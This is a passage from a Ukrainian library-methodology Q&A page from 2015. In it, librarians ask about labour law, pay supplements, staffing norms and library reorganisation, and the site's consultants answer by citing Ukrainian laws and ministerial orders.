Відповідь. Згідно ст. 15 ЗУ «Про бібліотеки і бібліотечну справу» доцільність реорганізації та ліквідації бібліотек, що є у державній та комунальній власності, визначається відповідними органами виконавчої влади та органами місцевого самоврядування за погодженням із спеціально уповноваженим центральним органом виконавчої влади у сфері культури» – тобто із Міністерством культури України. Алгоритм дій щодо ліквідації бібліотеки передбачає створення ліквідаційній комісії, яка здійснює відповідні організаційно-правові заходи щодо припинення комунальної установи сільська бібліотека. |
Питання №5641 |
maria
05/10/2015 × 09:25 | Доброго дня! Дайте відповідь, будь ласка, на таке запитання: чи є обов'язковою виплата матеріальної допомоги на оздоровлення бібліотечним працівникам? Начальник відділу культури зсилається на бюджетний кодекс 2015 року, що виплата обовязковою є тільки для вчителів музичних шкіл, а для бібліотечних працівників - в межах фонду заробітної плати. Дякую!
Відповідь. Начальнику відділу культури варто нагадати про ст. 30 ЗУ «Про бібліотеки і бібліотечну справу»: працівники бібліотек мають право на допомогу на оздоровлення при наданні щорічної відпустки у розмірі посадового окладу, а також матеріальну допомогу для вирішення соціально-побутових питань та доплату за вислугу років у розмірах та порядку, що встановлюються Кабінетом Міністрів України, а також про діючу Постанову КМУ від 30 вересня 2009 р. N 1062.
Матеріальна допомога для оздоровлення є обов’язковою виплатою і кошти для її виплати необхідно було передбачити в кошторисі на 2015 рік.
|
Питання №5640 |
Liza 03/10/2015 × 20:13 | Доброго дня, шановні колеги! Скажіть, будь ласка, хто визначає розміри доплат і надбавок заступникам директора бібліотеки?
Відповідь. На сьогоднішній день відповідно до Постанови КМУ «Про внесення зміни до пункту 4 постанови Кабінету Міністрів України від 30 серпня 2002 р. № 1298» від 5 серпня 2015 р. № 566 /Режим доступу: http://zakon2.rada.gov.ua/laws/show/566-2015-%D0%BF - керівник установи (директор бібліотеки). При цьому враховується фонд заробітної плати.
|
Питання №5639 |
Alina
02/10/2015 × 10:07 | Доброго дня! Підкажіть, будь-ласка, чи може завідувач сільською бібліотекою працювати на 0,5 ставки? (інших працівників немає). Методисти кажуть, що "ні". Але обов'язки та об'єм роботи залишається незмінним. Якщо ні, то яким документом це регламентується?
Відповідь. Неповний робочий час встановлюється за погодженням між працівником та роботодавцем. Така домовленість між сторонами трудового договору можлива безпосередньо при прийнятті на роботу, так і згодом, у період роботи; на певний термін і без зазначення такого терміну (див. ст. 56 КЗпП ). Також, роботодавець має право встановити неповний робочий час певному працівникові , але за умови дотримання процедури зміни істотних умов праці, передбаченої статтею 32 КЗпП. Оплата праці при неповному робочому дні (тижні) здійснюється пропорційно до відпрацьованого часу. Зберегти попередній обсяг роботи - апріорі неможливо. Розрахунок навантаження на зав. бібліотеки, який працює неповний робочий тиждень здійснюється відповідно до Типових норм часу на основні процеси бібліотечної роботи, затверджені Наказом Міністерства культури і туризму України | №1631/0/16-08 від 29.12.08 Режим доступу: http://profy.nplu.org/articles.php?lng=uk&pg=83 . |
Питання №5638 |
Tatyana
02/10/2015 × 08:28 | Доброго дня, шановні колеги! На території нашого району функціонують 23 самостійні сільські бібліотеки. Часткова децентралізація (передача фінансування бібліотек-філій місцевим радам) відбулася в 2001 році, ліквідація ЦБС – 2010
році. Відповідно до змін в фінансуванні закладів культури, що знаходяться у власності територіальних громад сіл відбудеться передача сільських бібліотек (як не юридичних осіб) в відділ культури і передача на баланс бібліотечних фондів від сільських рад. Які документи на передачу і прийняття фонду необхідно
оформити. Чи потрібен бути інвентаризаційний опис всього фонду, як того вимагає бухгалтерія?
Відповідь. Відповідно до ст.26 Закону “Про місцеве самоврядування в Україні”, до виключної компетенції сільських, селищних, міських рад відноситься прийняття рішень про відчуження відповідно до закону комунального майна; про передачу іншим органам окремих повноважень з управління майном, що відноситься до комунальної власності відповідної територіальної громади, визначення меж їх повноважень та умов їх здійснення. Після прийняття сесією рішення щодо реорганізації (шляхом злиття, приєднання, поділу та перетворення) призначається відповідна комісія для приймання-передачі майна та складання передаточного балансу. В АКТі приймання-передачі зазначається загальна кількість бібліотечного фонду та його вартість.
|
Питання №5637 |
Tatyana 01/10/2015 × 10:03 http://library.dp.ua | Шановні колеги! Інформаційно-бібліографічний відділ Центральної бібліотеки готує практикум для бібліотек-філіалів ЦБС по редагуванню 63 розділу Систематичної картотеки статей. Скажіть, будь ласка, які зміни у структуру 63 розділу СКС треба внести згідно Закону України «Про засудження комуністичного та націонал-соціалістичного (нацистського) тоталітарних режимів в Україні та заборону пропаганди їхньої символіки»? Чи є відповідні методичні рекомендації?
Для прийняття методичного рішення щодо редагування вищезазначеного розділу в СК, СКС пропонуємо опрацювати ЗУ ««Про увічнення перемоги над нацизмом у Другій Світовій війні 1939–1945 років» (від 09.04.2015 № 315-VIII), ЗУ «Про правовий статус та вшанування пам’яті учасників боротьби за незалежність України у ХХ столітті» (від 09.04.2015 № 314-VIII), З У «Про засудження комуністичного та націонал-соціалістичного (нацистського) тоталітарних режимів в Україні та заборону пропаганди їхньої символіки» (від 09.04.2015 № 317-VIII) та скористатись матеріалами, підготовленими Українським інститутом національної пам'яті : інформаційно-довідковим виданням "Україна в другій світовій війні"/Режим доступу: http://www.memory.gov.ua/news/istoriki-stvorili-informatsiino-dovidkove-vidannya-ukraina-v-drugii-svitovii-viini ; Методичними матеріалами до відзначення Дня пам’яті та примирення та 70-ї річниці Дня перемоги над нацизмом у Другій світовій війні (8-9 травня 2015 р.)/Режим доступу: http://www.memory.gov.ua/news/metodichni-materiali-do-vidznachennya-dnya-pam-yati-ta-primirennya-ta-70-i-richnitsi-dnya-perem . |
Питання №5636 |
Ilona 30/09/2015 × 13:55 | Доброго дня, шановні колеги! Скажіть, будь ласка, хто має право розпоряджатися надбавками для бібліотекарів, які виділені міською владою? Хто має право їх розділяти? Там стала сума чи на чийсь розгляд? Дякую за увагу!
Відповідь. Конкретний розмір надбавки встановлюється керівником установи, закладу, організації у межах фонду оплати праці (див. Постанову КМ України від 30 вересня 2009 року, № 1073 (із змінами)/Режим доступу: http://zakon4.rada.gov.ua/laws/show/1073-2009-%D0%BF ; п.3 Наказу МКТ України від 18.10.2005 N 745, із змінами /Режим доступу: http://zakon2.rada.gov.ua/laws/show/z1285-05 . |
Питання №5635 |
Larisa 29/09/2015 × 20:09 | Добрый вечер! Скажите, пожалуйста, может ли работник научной библиотеки занимать должность зав.сектора и при этом иметь высшее агрономическое образование? Получается, что зав.сектора может иметь даже энергетическое образование, лишь бы только высшее?
Відповідь. Кваліфікаційні вимоги до посади зав. сектору чітко прописані в Довіднику кваліфікаційних характеристик професій працівників (випуск 81. Культура і мистецтво. Розділ «Бібліотеки, централізовані бібліотечні системи»), затверджений наказом Міністерства культури і мистецтв України № 168 від 14 квітня 2000 р. (див. розділ сайту «Матеріали», лінк «Довідкові видання» – «Бібліотеки в правовому полі»: http://profy.nplu.org/download.php?lng=uk ). |
Питання №5633 |
Rita 28/09/2015 × 14:45 | Я не є членом профспілки (вийшла 5 років тому). Тому при скороченні які мої права, а які у членів профспілки? Дякую.
Відповідь. Чи мають члени професійних спілок додаткові права при скороченні працівників? Відповідно до частини першої статті 43 КЗпПУ розірвання трудового договору може бути проведено лише за попередньою згодою виборного органу (профспілкового представника) профспілки, членом якої є працівник. Якщо працівник не є членом профспілки, роботодавець має право звільнити такого працівника на підставі п. 1 ст. 40 КЗпПУ (зміни в організації виробництва і праці, в тому числі ліквідації, реорганізації, банкрутства або перепрофілювання підприємства, установи, організації, скорочення чисельності або штату працівників) без надання відповідного запиту виборному органу профспілки.
|
Питання №5632 |
olga 28/09/2015 × 14:13 | Скажите пожалуйста, какая норма площади уборки для библиотек централизованной библиотечной системы? В приказе МК № 900 от 22.08.2012 г. написано "вводиться із розрахунку 0,5 штатної одиниці на кожні 250 кв. метрів площі, що прибирається, але не менше 1 посади на бібліотеку." Эта норма распространяется на библиотеки централизованных библиотечных систем?
Відповідь. Розповсюджується. Також звертаємо увагу на МІЖГАЛУЗЕВІ НОРМИ чисельності робітників, що обслуговують громадські будівлі (будівлі управлінь, конструкторські і проектні організації), затверджений Наказом Міністерства праці та соціальної політики України 11.05.2004 N 105 (Режим доступу: http://ua-info.biz/legal/baseqe/ua-amtbou/ ) та розділ нашого сайту Консультації, лінк Санітарно-гігієнічні норми /Режим доступу: http://profy.nplu.org/faq.php?lng=uk . |
Питання №5631 |
Valentina
28/09/2015 × 11:58 | По якому закону України визначається штатний розпис працівників районної бібліотеки?
Відповідь. На сьогоднішній день штатний розпис ЦБС складається відповідно до її Положення (статуту), виходячи з цілей і предмету її діяльності. Формування структури та штатного розпису здійснюється з урахуванням кількості користувачів, видачі документів, відвідувань (у т.ч., – веб-сайту та соціокультурних заходів), рівня впровадження інформаційних технологій та у межах затвердженого фонду заробітної плати. Посадовий і чисельний склад визначається на основі розрахунків навантаження на працівників, згідно «Типових норм часу на основні процеси бібліотечної роботи» (затверджено Наказом Міністерства культури і туризму України 29.12.2008 N 1631/0/16-08) |Режим доступу: http://profy.nplu.org/articles.php?lng=uk&pg=83), Національного класифікатора України - "Класифікатор професій" - ДК 003:2010, «Довідника кваліфікаційних характеристик професій працівників. Випуск 81 "Культура та мистецтво", затвердженого наказом Міністерства культури і мистецтв України 14.04.2000 р. N 168.
Тарифні розряди відповідно до груп бібліотек, централізованих бібліотечних систем (їх філіалів) наведено в Таблиці 4 до наказу Міністерства культури і туризму України 18.10.2005 N 745 /Режим доступу: http://zakon4.rada.gov.ua/laws/show/z1285-05/page3 . Також, звертаємо увагу на Постанову КМУ «Про підвищення оплати праці працівників установ, закладів та організацій окремих галузей бюджетної сфери» від 16 вересня 2015 р.№ 731 /Режим доступу: http://ukurier.gov.ua/uk/articles/pro-pidvishennya-oplati-praci-pracivnikiv-ustanov-/ .
|
Питання №5630 |
Tatyana
28/09/2015 × 10:03 | Доброго дня! Чи може працівник який оформлений по трудовому договору на 0,5 ставки бути матеріально відповідальним?
Відповідь. Пропонуємо ознайомитись із статтею ученого секретаря НПБУ Розколупи, Н.І. До проблем обліку бібліотечних фондів //Бібліотечна планета. – 2006. – № 2. – С. 11-14) // http://profy.nplu.org/!site/publication/lp-32.pdf; юридичною консультацією на сторінках Бібліотечної планети за 2008 р. у № 4 (електронна версія розміщена на сайті); Професійним досьє бібліотекаря. № 1/2 (36/37) : інформ.-метод. бюл. / Терноп. обл. універс. наук.б-ка ; підгот. С. Т. Єрошенкова ; ред.О. М. Раскіна. – Т., 2011. – 28 с. (є електронна версія).
|
Питання №5629 |
Galina
28/09/2015 × 08:54 http://ounb.km.ua | Зорич Олександр, Васильєв Володимир, Арєнєв Володимир - українські автори, чи російські
Відповідь. 1.Зорич Олександр - літературний псевдонім письменницького тандему Дмитра В'ячеславовича Гордевського і Яни Володимирівни Боцман, з 2004р. - члени Спілки Російських письменників. З 2010р. живуть і працюють в Москві та вважають себе російськими письменниками.
2.Васильєв Володимир Миколайович - український російськомовний письменник > 3.Арєнєв Володимир Костянтинович - український письменник
Зав.сектору - Л.Б. Ляшенко
|
Питання №5628 |
Nik 25/09/2015 × 13:35 | Чи можна придбати для бібліотеки комп’ютерну техніку в 2015 році? Дякую.
Відповідь. Заходами щодо економного та раціонального використання державних коштів, передбачених для утримання органів державної влади та інших державних органів, утворених органами державної влади підприємств, установ та організацій, які використовують кошти державного бюджету, затвердженими постановою КМУ від 01.03.2014 р. № 65 , передбачено, що придбавати побутову техніку можливо за рахунок коштів спеціального фонду бюджету, які отримані як гранти, міжнародна технічна допомога, благодійні внески.
Крім того, Держказначейська служба у листі від 04.07.2014 р. № 17-08/659-15588, посилаючись на лист Мінфіну від 22.05.2014 р. № 31-10040-18-10/12445, зазначила, що заборона на придбання таких засобів оргтехніки, як комп’ютери, а також комплектуючі до них, зазначеними Заходами не передбачена.
|
Питання №5627 |
Iryna 25/09/2015 × 13:00 | Біля бібліотеки розрослися хащі сухих кущів. Ми хотіли їх викопати і засадити квітами, але нам заборонили. Поясніть, невже сухі хащі краще квітника?
Відповідь. Процедуру видалення дерев, кущів, газонів і квітників на території населеного пункту (у тому числі й на території бюджетних установ) визначає Порядок видалення дерев, кущів, газонів і квітників у населених пунктах, затверджений постановою КМУ від 01.08.2006 р. № 1045 /Режим доступу: http://zakon2.rada.gov.ua/laws/show/1045-2006-%D0%BF . Так, відповідно до п. 7 цього Порядку видалення аварійних, сухостійних і фаутних дерев на об'єкті благоустрою здійснює балансоутримувач на підставі акта обстеження тих насаджень, що підлягають видаленню. Цей документ оформляє комісія, сформована виконавчим органом міськради.2) У разі знесення аварійних, сухостійних і фаутних дерев комісія з'ясовує причину набуття деревами такого стану, що відображає в акті.
Дозволяється проводити видалення з подальшим оформленням документів лише у випадку ліквідації стихійного лиха або якщо стан насаджень загрожує життю, здоров'ю населення чи майну юридичних та/або фізичних осіб (п. 8 Порядку № 1045).
|
Актуальна інформація
Вітаємо шановних відвідувачів на сайті, який супроводжує науково-методичний відділ Національної бібліотеки України імені Ярослава Мудрого (НБУ ім. Ярослава Мудрого). Наш відділ є науково-методичним та інформаційно-консультативним центром для публічних бібліотек України, а також співпрацює з бібліотеками різних типів і форм власності.
Пам'ятайте, що наповнення цього сайту - наша спільна робота. Якщо Ви маєте матеріали, що можуть зацікавити бібліотечну спільноту, або бажаєте підняти актуальну тему - чекаємо Ваших пропозицій на адресу method@nplu.org.
Шановні колеги! Якщо у вас змінилися реквізити (адреса, e-mail, URL, телефон тощо) надішліть повідомлення для відповідних коректив на сторінці сайту „Бібліотеки України”.
| Вітаємо
For Librarians
Библиотекарю
Пошук
Голосування
|